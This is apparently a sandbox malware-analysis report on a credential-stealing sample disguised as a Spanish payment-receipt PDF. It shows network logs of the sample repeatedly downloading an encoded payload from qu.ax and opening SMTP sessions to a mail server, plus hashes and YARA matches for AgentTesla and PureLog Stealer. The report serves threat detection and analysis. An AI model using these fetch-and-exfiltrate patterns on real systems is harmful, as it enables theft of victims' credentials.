                                                                              Data Ascii: ody><div> <h1>Example Domain</h1> <p>This domain is for use in illustrative examples in documents. You may use this domain in literature without prior coordination or asking for permission.</p> <p><a href="https://www.iana.org


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              8 | 192.168.2.5 | 49732 | 93.184.216.34 | 80 | 6844 | C:\Users\user\AppData\Roaming\repeat\repeat.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              Feb 21, 2024 21:09:30.124417067 CET | 172 | OUT | POST /recepticle.aspx HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: www.example.com
                                                                              Content-Length: 25
                                                                              Expect: 100-continue
                                                                              Connection: Keep-Alive
                                                                              Feb 21, 2024 21:09:30.211880922 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                              Feb 21, 2024 21:09:30.212404966 CET | 25 | OUT | Data Raw: 74 68 69 6e 67 31 3d 68 65 6c 6c 6f 26 74 68 69 6e 67 32 3d 77 6f 72 6c 64
                                                                              Data Ascii: thing1=hello&thing2=world
                                                                              Feb 21, 2024 21:09:30.364942074 CET | 652 | IN | HTTP/1.1 404 Not Found
                                                                              Cache-Control: max-age=604800
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Date: Wed, 21 Feb 2024 20:09:30 GMT
                                                                              Expires: Wed, 28 Feb 2024 20:09:30 GMT
                                                                              Server: EOS (vny/0451)
                                                                              Content-Length: 433
                                                                              Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title>404 - Not Found</title></head><body><h1>404 - Not Found</h1><script type="text/javascript" src="//obj.ac.bcon.ecdns.net/ec_tpm_bcon.js"></script></body></html>


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              9 | 192.168.2.5 | 49734 | 93.184.216.34 | 80 | 6844 | C:\Users\user\AppData\Roaming\repeat\repeat.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              Feb 21, 2024 21:09:31.785970926 CET | 56 | OUT | GET /recepticle.aspx HTTP/1.1
                                                                              Host: www.example.com
                                                                              Feb 21, 2024 21:09:31.873991966 CET | 1286 | IN | HTTP/1.1 404 Not Found
                                                                              Accept-Ranges: bytes
                                                                              Age: 366114
                                                                              Cache-Control: max-age=604800
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Date: Wed, 21 Feb 2024 20:09:31 GMT
                                                                              Expires: Wed, 28 Feb 2024 20:09:31 GMT
                                                                              Last-Modified: Sat, 17 Feb 2024 14:27:37 GMT
                                                                              Server: ECS (nyb/1D29)
                                                                              Vary: Accept-Encoding
                                                                              X-Cache: 404-HIT
                                                                              Content-Length: 1256
                                                                              Data Ascii: <!doctype html><html><head> <title>Example Domain</title> <meta charset="utf-8" /> <meta http-equiv="Content-type" content="text/html; charset=utf-8" /> <meta name="viewport" content="width=device-width, initial-scale=1" /> <style type="text/css"> body { background-color: #f0f0f2; margin: 0; padding: 0; font-family: -apple-system, system-ui, BlinkMacSystemFont, "Segoe UI", "Open Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; } div { width: 600px; margin: 5em auto; padding: 2em; background-color: #fdfdff; border-radius: 0.5em; box-shadow: 2px 3px 7px 2px rgba(0,0,0,0.02); } a:link, a:visited { color: #38488f; text-decoration: none; } @media (max-width: 700px) { div { margin: 0 auto; width: auto; } } </style> </head><b
                                                                              Feb 21, 2024 21:09:31.874003887 CET | 312 | IN | Data Raw: 6f 64 79 3e 0a 3c 64 69 76 3e 0a 20 20 20 20 3c 68 31 3e 45 78 61 6d 70 6c 65 20 44 6f 6d 61 69 6e 3c 2f 68 31 3e 0a 20 20 20 20 3c 70 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 69 73 20 66 6f 72 20 75 73 65 20 69 6e 20 69 6c 6c 75 73 74 72 61 74 69
                                                                              Data Ascii: ody><div> <h1>Example Domain</h1> <p>This domain is for use in illustrative examples in documents. You may use this domain in literature without prior coordination or asking for permission.</p> <p><a href="https://www.iana.org


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              0 | 192.168.2.5 | 49706 | 45.83.31.187 | 443 | 2360 | C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-02-21 20:08:49 UTC | 63 | OUT | GET /HCHP.pdf HTTP/1.1
                                                                              Host: qu.ax
                                                                              Connection: Keep-Alive
                                                                              2024-02-21 20:08:49 UTC | 356 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx
                                                                              Date: Wed, 21 Feb 2024 20:08:49 GMT
                                                                              Content-Type: application/pdf
                                                                              Content-Length: 729088
                                                                              Connection: close
                                                                              Last-Modified: Wed, 21 Feb 2024 16:34:15 GMT
                                                                              Cache-Control: public, max-age=2592000
                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                              Accept-Ranges: bytes


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              1 | 192.168.2.5 | 49711 | 45.83.31.187 | 443 | 7128 | C:\Users\user\AppData\Roaming\Reramvw.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              2024-02-21 20:09:04 UTC | 63 | OUT | GET /HCHP.pdf HTTP/1.1
                                                                              Host: qu.ax
                                                                              Connection: Keep-Alive
                                                                              2024-02-21 20:09:05 UTC | 356 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx
                                                                              Date: Wed, 21 Feb 2024 20:09:05 GMT
                                                                              Content-Type: application/pdf
                                                                              Content-Length: 729088
                                                                              Connection: close
                                                                              Last-Modified: Wed, 21 Feb 2024 16:34:15 GMT
                                                                              Cache-Control: public, max-age=2592000
                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                              Accept-Ranges: bytes
                                                                              Data Ascii: mhH^{8~Z1Lxf3lkc_*H~B+yvHnGp5pX/hb2f[WO0FH%\%%P4,y)D>*!j(yy^ [NeTSzn9>xFC,+J&=Oz&lW2ZNuFpT/tnO
                                                                              2024-02-21 20:09:05 UTC16384INData Raw: 13 c1 3f 19 67 77 40 79 a5 df 95 1e ec 0a 13 b0 13 06 ba d2 48 7a c1 bf 22 ae 3c f7 35 30 93 a0 ea f1 c8 13 d1 20 77 68 bd d4 c6 b3 c4 6f 7d d2 78 2b 24 4b 63 5f 2c ad c2 2f ec da fc 40 4d 6a 23 d4 cf 7f ce b3 38 04 02 f3 82 72 f3 fe 22 3d 86 1c 50 9f 0a 4b 9e c8 4e d3 5a 69 7c f5 18 5f 49 4b 53 e6 d7 d6 c4 ad 4e d1 c1 a6 d8 5b 5a b1 44 99 85 a1 2b c1 b7 49 5d aa 8b 26 48 68 5c cd af 65 83 fc 6f 9c 63 b0 3d 5c 4e 8a 3d 81 8e 79 94 16 4d 3f 47 f3 cc ea 8a a0 87 5d 00 0c 73 3c bf c3 be ab dc c3 e1 e5 69 9a 88 f3 37 dc 35 73 68 64 e2 6d d1 10 8e 05 54 ea 34 e2 7f f5 3f fc b2 53 ea 1d b2 43 fb 2c 10 2b 3e 93 cf ee 66 ed 6f ba 17 04 6b 25 50 8d be 9e e7 83 0b fa e8 97 1b da 9d 64 48 1b a5 37 e0 82 72 25 7e 35 90 60 ee 04 c8 81 9a d6 a2 a1 81 96 23 64 d9 19 1a
                                                                              Data Ascii: ?gw@yHz"<50 who}x+$Kc_,/@Mj#8r"=PKNZi|_IKSN[ZD+I]&Hh\eoc=\N=yM?G]s<i75shdmT4?SC,+>fok%PdH7r%~5`#d
                                                                              2024-02-21 20:09:05 UTC16384INData Raw: 90 37 f4 80 32 5f 8a 18 10 af ef ba cf 07 fc 5e ef 04 2e 6a 0a 7f 64 9c a4 32 f2 4f 57 a5 fc e5 7b 24 cd 30 a5 90 90 ea f1 43 fc 2a 1d f0 2b 34 da 4e 53 8b fd f9 03 89 a9 93 54 e8 26 d3 ad a6 e6 27 d9 42 f9 5a 69 cf 4f 1d 07 7e af 92 bb 27 6e 08 a8 b6 d0 ea 4c 6c f3 66 e4 83 51 48 e3 5a af 67 ac b9 72 e8 9a 2f f1 a2 20 d6 7c 96 bf 50 b5 4e 73 8b 20 c5 77 4d c3 a7 f8 dd ad 73 95 d2 5e 18 2a e9 6d 0b 4e 2c bd 1b b8 fa bd f8 23 a5 19 1f e6 b3 85 f1 8b 48 49 7c 7c 2b 81 fe bb 9f 5a 12 6d b2 ad 75 f4 bd 88 d1 c1 e5 97 25 60 1f 4a 01 17 ac 36 4a d1 85 b3 bd e8 14 8f 17 e9 5e b1 be 9e 38 9c 09 a6 80 33 ed 52 a7 58 a0 46 55 b1 47 49 3a 4f 53 02 50 e1 74 19 94 c5 05 65 a6 e1 4d 76 b5 21 e4 55 c1 a7 f5 5c 8f d6 61 c4 fe e7 18 51 eb 9d c3 b3 35 4f 5b 35 fb 05 3a 34
                                                                              Data Ascii: 72_^.jd2OW{$0C*+4NST&'BZiO~'nLlfQHZgr/ |PNs wMs^*mN,#HI||+Zmu%`J6J^83RXFUGI:OSPteMv!U\aQ5O[5:4


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 49723 | 45.83.31.187 | 443 | 7056 | C:\Users\user\AppData\Roaming\repeat\repeat.exe

Timestamp | Bytes transferred | Direction | Data
2024-02-21 20:09:13 UTC | 63 | OUT | GET /HCHP.pdf HTTP/1.1
    Host: qu.ax
    Connection: Keep-Alive
2024-02-21 20:09:13 UTC | 356 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Wed, 21 Feb 2024 20:09:13 GMT
    Content-Type: application/pdf
    Content-Length: 729088
    Connection: close
    Last-Modified: Wed, 21 Feb 2024 16:34:15 GMT
    Cache-Control: public, max-age=2592000
    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
    Alt-Svc: h3=":443"; ma=86400
    Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.5 | 49728 | 45.83.31.187 | 443 | 6472 | C:\Users\user\AppData\Roaming\Reramvw.exe

Timestamp | Bytes transferred | Direction | Data
2024-02-21 20:09:22 UTC | 63 | OUT | GET /HCHP.pdf HTTP/1.1
    Host: qu.ax
    Connection: Keep-Alive
2024-02-21 20:09:22 UTC | 356 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Wed, 21 Feb 2024 20:09:22 GMT
    Content-Type: application/pdf
    Content-Length: 729088
    Connection: close
    Last-Modified: Wed, 21 Feb 2024 16:34:15 GMT
    Cache-Control: public, max-age=2592000
    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
    Alt-Svc: h3=":443"; ma=86400
    Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.5 | 49733 | 45.83.31.187 | 443 | 6844 | C:\Users\user\AppData\Roaming\repeat\repeat.exe

Timestamp | Bytes transferred | Direction | Data
2024-02-21 20:09:30 UTC | 63 | OUT | GET /HCHP.pdf HTTP/1.1
    Host: qu.ax
    Connection: Keep-Alive
2024-02-21 20:09:31 UTC | 356 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Wed, 21 Feb 2024 20:09:30 GMT
    Content-Type: application/pdf
    Content-Length: 729088
    Connection: close
    Last-Modified: Wed, 21 Feb 2024 16:34:15 GMT
    Cache-Control: public, max-age=2592000
    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
    Alt-Svc: h3=":443"; ma=86400
    Accept-Ranges: bytes


Timestamp  Source Port  Dest Port  Source IP  Dest IP  Commands
Feb 21, 2024 21:08:54.681421041 CET  587  49708  191.252.141.106  192.168.2.5  220-iuri0194.hospedagemdesites.ws ESMTP Exim 4.95 #2 Wed, 21 Feb 2024 17:08:54 -0300
    220-We do not authorize the use of this system to transport unsolicited,
    220 and/or bulk e-mail.
Feb 21, 2024 21:08:54.681838036 CET  49708  587  192.168.2.5  191.252.141.106  EHLO 405464
Feb 21, 2024 21:08:54.888376951 CET  587  49708  191.252.141.106  192.168.2.5  250-iuri0194.hospedagemdesites.ws Hello 405464 [191.96.227.222]
    250-SIZE 52428800
    250-8BITMIME
    250-PIPELINING
    250-PIPE_CONNECT
    250-AUTH PLAIN LOGIN
    250-STARTTLS
    250 HELP
Feb 21, 2024 21:08:54.888714075 CET  49708  587  192.168.2.5  191.252.141.106  STARTTLS
Feb 21, 2024 21:08:55.087846041 CET  587  49708  191.252.141.106  192.168.2.5  220 TLS go ahead
Feb 21, 2024 21:08:58.227288008 CET  587  49709  191.252.141.106  192.168.2.5  220-iuri0194.hospedagemdesites.ws ESMTP Exim 4.95 #2 Wed, 21 Feb 2024 17:08:58 -0300
    220-We do not authorize the use of this system to transport unsolicited,
    220 and/or bulk e-mail.
Feb 21, 2024 21:08:58.227473974 CET  49709  587  192.168.2.5  191.252.141.106  EHLO 405464
Feb 21, 2024 21:08:58.424025059 CET  587  49709  191.252.141.106  192.168.2.5  250-iuri0194.hospedagemdesites.ws Hello 405464 [191.96.227.222]
    250-SIZE 52428800
    250-8BITMIME
    250-PIPELINING
    250-PIPE_CONNECT
    250-AUTH PLAIN LOGIN
    250-STARTTLS
    250 HELP
Feb 21, 2024 21:08:58.424221992 CET  49709  587  192.168.2.5  191.252.141.106  STARTTLS
Feb 21, 2024 21:08:58.625976086 CET  587  49709  191.252.141.106  192.168.2.5  220 TLS go ahead
Feb 21, 2024 21:09:09.247705936 CET  587  49720  191.252.141.106  192.168.2.5  220-iuri0194.hospedagemdesites.ws ESMTP Exim 4.95 #2 Wed, 21 Feb 2024 17:09:09 -0300
    220-We do not authorize the use of this system to transport unsolicited,
    220 and/or bulk e-mail.
Feb 21, 2024 21:09:09.248199940 CET  49720  587  192.168.2.5  191.252.141.106  EHLO 405464
Feb 21, 2024 21:09:09.453123093 CET  587  49720  191.252.141.106  192.168.2.5  250-iuri0194.hospedagemdesites.ws Hello 405464 [191.96.227.222]
    250-SIZE 52428800
    250-8BITMIME
    250-PIPELINING
    250-PIPE_CONNECT
    250-AUTH PLAIN LOGIN
    250-STARTTLS
    250 HELP
Feb 21, 2024 21:09:09.453357935 CET  49720  587  192.168.2.5  191.252.141.106  STARTTLS
Feb 21, 2024 21:09:09.652488947 CET  587  49720  191.252.141.106  192.168.2.5  220 TLS go ahead
Feb 21, 2024 21:09:12.959785938 CET  587  49721  191.252.141.106  192.168.2.5  220-iuri0194.hospedagemdesites.ws ESMTP Exim 4.95 #2 Wed, 21 Feb 2024 17:09:12 -0300
    220-We do not authorize the use of this system to transport unsolicited,
    220 and/or bulk e-mail.
Feb 21, 2024 21:09:12.960318089 CET  49721  587  192.168.2.5  191.252.141.106  EHLO 405464
Feb 21, 2024 21:09:13.160278082 CET  587  49721  191.252.141.106  192.168.2.5  250-iuri0194.hospedagemdesites.ws Hello 405464 [191.96.227.222]
    250-SIZE 52428800
    250-8BITMIME
    250-PIPELINING
    250-PIPE_CONNECT
    250-AUTH PLAIN LOGIN
    250-STARTTLS
    250 HELP
Feb 21, 2024 21:09:13.160499096 CET  49721  587  192.168.2.5  191.252.141.106  STARTTLS
Feb 21, 2024 21:09:13.358985901 CET  587  49721  191.252.141.106  192.168.2.5  220 TLS go ahead
Feb 21, 2024 21:09:16.020622969 CET  587  49725  191.252.141.106  192.168.2.5  220-iuri0194.hospedagemdesites.ws ESMTP Exim 4.95 #2 Wed, 21 Feb 2024 17:09:15 -0300
    220-We do not authorize the use of this system to transport unsolicited,
    220 and/or bulk e-mail.
Feb 21, 2024 21:09:16.020876884 CET  49725  587  192.168.2.5  191.252.141.106  EHLO 405464
Feb 21, 2024 21:09:16.217204094 CET  587  49725  191.252.141.106  192.168.2.5  250-iuri0194.hospedagemdesites.ws Hello 405464 [191.96.227.222]
    250-SIZE 52428800
    250-8BITMIME
    250-PIPELINING
    250-PIPE_CONNECT
    250-AUTH PLAIN LOGIN
    250-STARTTLS
    250 HELP
Feb 21, 2024 21:09:16.217443943 CET  49725  587  192.168.2.5  191.252.141.106  STARTTLS
Feb 21, 2024 21:09:16.415726900 CET  587  49725  191.252.141.106  192.168.2.5  220 TLS go ahead
Feb 21, 2024 21:09:19.486104965 CET  587  49726  191.252.141.106  192.168.2.5  220-iuri0194.hospedagemdesites.ws ESMTP Exim 4.95 #2 Wed, 21 Feb 2024 17:09:19 -0300
    220-We do not authorize the use of this system to transport unsolicited,
    220 and/or bulk e-mail.
Feb 21, 2024 21:09:19.488898993 CET  49726  587  192.168.2.5  191.252.141.106  EHLO 405464
Feb 21, 2024 21:09:19.687505960 CET  587  49726  191.252.141.106  192.168.2.5  250-iuri0194.hospedagemdesites.ws Hello 405464 [191.96.227.222]
    250-SIZE 52428800
    250-8BITMIME
    250-PIPELINING
    250-PIPE_CONNECT
    250-AUTH PLAIN LOGIN
    250-STARTTLS
    250 HELP
Feb 21, 2024 21:09:19.700314999 CET  49726  587  192.168.2.5  191.252.141.106  STARTTLS
Feb 21, 2024 21:09:19.902008057 CET  587  49726  191.252.141.106  192.168.2.5  220 TLS go ahead
Feb 21, 2024 21:09:25.554183006 CET  587  49730  191.252.141.106  192.168.2.5  220-iuri0194.hospedagemdesites.ws ESMTP Exim 4.95 #2 Wed, 21 Feb 2024 17:09:25 -0300
    220-We do not authorize the use of this system to transport unsolicited,
    220 and/or bulk e-mail.
Feb 21, 2024 21:09:25.554470062 CET  49730  587  192.168.2.5  191.252.141.106  EHLO 405464
Feb 21, 2024 21:09:25.755125999 CET  587  49730  191.252.141.106  192.168.2.5  250-iuri0194.hospedagemdesites.ws Hello 405464 [191.96.227.222]
    250-SIZE 52428800
    250-8BITMIME
    250-PIPELINING
    250-PIPE_CONNECT
    250-AUTH PLAIN LOGIN
    250-STARTTLS
    250 HELP
Feb 21, 2024 21:09:25.756803989 CET  49730  587  192.168.2.5  191.252.141.106  STARTTLS
Feb 21, 2024 21:09:25.957879066 CET  587  49730  191.252.141.106  192.168.2.5  220 TLS go ahead
Feb 21, 2024 21:09:28.907258034 CET  587  49731  191.252.141.106  192.168.2.5  220-iuri0194.hospedagemdesites.ws ESMTP Exim 4.95 #2 Wed, 21 Feb 2024 17:09:28 -0300
    220-We do not authorize the use of this system to transport unsolicited,
    220 and/or bulk e-mail.
Feb 21, 2024 21:09:28.907392979 CET  49731  587  192.168.2.5  191.252.141.106  EHLO 405464
Feb 21, 2024 21:09:29.105324030 CET  587  49731  191.252.141.106  192.168.2.5  250-iuri0194.hospedagemdesites.ws Hello 405464 [191.96.227.222]
    250-SIZE 52428800
    250-8BITMIME
    250-PIPELINING
    250-PIPE_CONNECT
    250-AUTH PLAIN LOGIN
    250-STARTTLS
    250 HELP
Feb 21, 2024 21:09:29.105583906 CET  49731  587  192.168.2.5  191.252.141.106  STARTTLS
Feb 21, 2024 21:09:29.306200981 CET  587  49731  191.252.141.106  192.168.2.5  220 TLS go ahead
Feb 21, 2024 21:09:33.629554987 CET  587  49735  191.252.141.106  192.168.2.5  220-iuri0194.hospedagemdesites.ws ESMTP Exim 4.95 #2 Wed, 21 Feb 2024 17:09:33 -0300
    220-We do not authorize the use of this system to transport unsolicited,
    220 and/or bulk e-mail.
Feb 21, 2024 21:09:33.629923105 CET  49735  587  192.168.2.5  191.252.141.106  EHLO 405464
Feb 21, 2024 21:09:33.826782942 CET  587  49735  191.252.141.106  192.168.2.5  250-iuri0194.hospedagemdesites.ws Hello 405464 [191.96.227.222]
    250-SIZE 52428800
    250-8BITMIME
    250-PIPELINING
    250-PIPE_CONNECT
    250-AUTH PLAIN LOGIN
    250-STARTTLS
    250 HELP
Feb 21, 2024 21:09:33.829037905 CET  49735  587  192.168.2.5  191.252.141.106  STARTTLS
Feb 21, 2024 21:09:34.027642012 CET  587  49735  191.252.141.106  192.168.2.5  220 TLS go ahead
Feb 21, 2024 21:09:37.145499945 CET  587  49736  191.252.141.106  192.168.2.5  220-iuri0194.hospedagemdesites.ws ESMTP Exim 4.95 #2 Wed, 21 Feb 2024 17:09:37 -0300
    220-We do not authorize the use of this system to transport unsolicited,
    220 and/or bulk e-mail.
Feb 21, 2024 21:09:37.145700932 CET  49736  587  192.168.2.5  191.252.141.106  EHLO 405464
Feb 21, 2024 21:09:37.342232943 CET  587  49736  191.252.141.106  192.168.2.5  250-iuri0194.hospedagemdesites.ws Hello 405464 [191.96.227.222]
    250-SIZE 52428800
    250-8BITMIME
    250-PIPELINING
    250-PIPE_CONNECT
    250-AUTH PLAIN LOGIN
    250-STARTTLS
    250 HELP
Feb 21, 2024 21:09:37.418860912 CET  49736  587  192.168.2.5  191.252.141.106  STARTTLS
Feb 21, 2024 21:09:37.616910934 CET  587  49736  191.252.141.106  192.168.2.5  220 TLS go ahead

                                                                              Target ID:0
                                                                              Start time:21:08:46
                                                                              Start date:21/02/2024
                                                                              Path:C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe
                                                                              Imagebase:0xc50000
                                                                              File size:32'256 bytes
                                                                              MD5 hash:5D9F0CA0E2B0E41F30A1CCE0B002484B
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1992000502.0000000003308000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1992000502.0000000003308000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1995757334.0000000006780000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1994246590.0000000006430000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1992695119.00000000043C3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1992695119.00000000043C3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1992695119.0000000004172000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1992695119.0000000004172000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1992000502.00000000030FE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1992000502.00000000030FE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1992000502.000000000318D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1992000502.000000000318D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              Target ID:2
                                                                              Start time:21:08:49
                                                                              Start date:21/02/2024
                                                                              Path:C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exe
                                                                              Imagebase:0xad0000
                                                                              File size:32'256 bytes
                                                                              MD5 hash:5D9F0CA0E2B0E41F30A1CCE0B002484B
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.3214735733.0000000002EDE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.3214735733.0000000002F0A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.3214735733.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.3214735733.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:low
                                                                              Has exited:false

                                                                              Target ID:3
                                                                              Start time:21:09:01
                                                                              Start date:21/02/2024
                                                                              Path:C:\Users\user\AppData\Roaming\Reramvw.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\AppData\Roaming\Reramvw.exe"
                                                                              Imagebase:0x850000
                                                                              File size:32'256 bytes
                                                                              MD5 hash:5D9F0CA0E2B0E41F30A1CCE0B002484B
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000003.00000002.2156621801.0000000003BBB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000003.00000002.2152875189.0000000002A7E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000003.00000002.2152875189.0000000002A7E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000003.00000002.2156621801.0000000003CD3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000003.00000002.2152875189.0000000002C7F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000003.00000002.2152875189.0000000002C7F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.2152875189.0000000002BD0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.2152875189.0000000002BD0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\Reramvw.exe, Author: Joe Security
                                                                              Antivirus matches:
                                                                              • Detection: 100%, Avira
                                                                              • Detection: 100%, Joe Sandbox ML
                                                                              • Detection: 34%, ReversingLabs
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              Target ID:5
                                                                              Start time:21:09:05
                                                                              Start date:21/02/2024
                                                                              Path:C:\Users\user\AppData\Roaming\Reramvw.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Users\user\AppData\Roaming\Reramvw.exe
                                                                              Imagebase:0x110000
                                                                              File size:32'256 bytes
                                                                              MD5 hash:5D9F0CA0E2B0E41F30A1CCE0B002484B
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              Target ID:6
                                                                              Start time:21:09:05
                                                                              Start date:21/02/2024
                                                                              Path:C:\Users\user\AppData\Roaming\Reramvw.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Users\user\AppData\Roaming\Reramvw.exe
                                                                              Imagebase:0xf40000
                                                                              File size:32'256 bytes
                                                                              MD5 hash:5D9F0CA0E2B0E41F30A1CCE0B002484B
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.2331974047.000000000334A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.2331974047.000000000331E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.2326420531.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
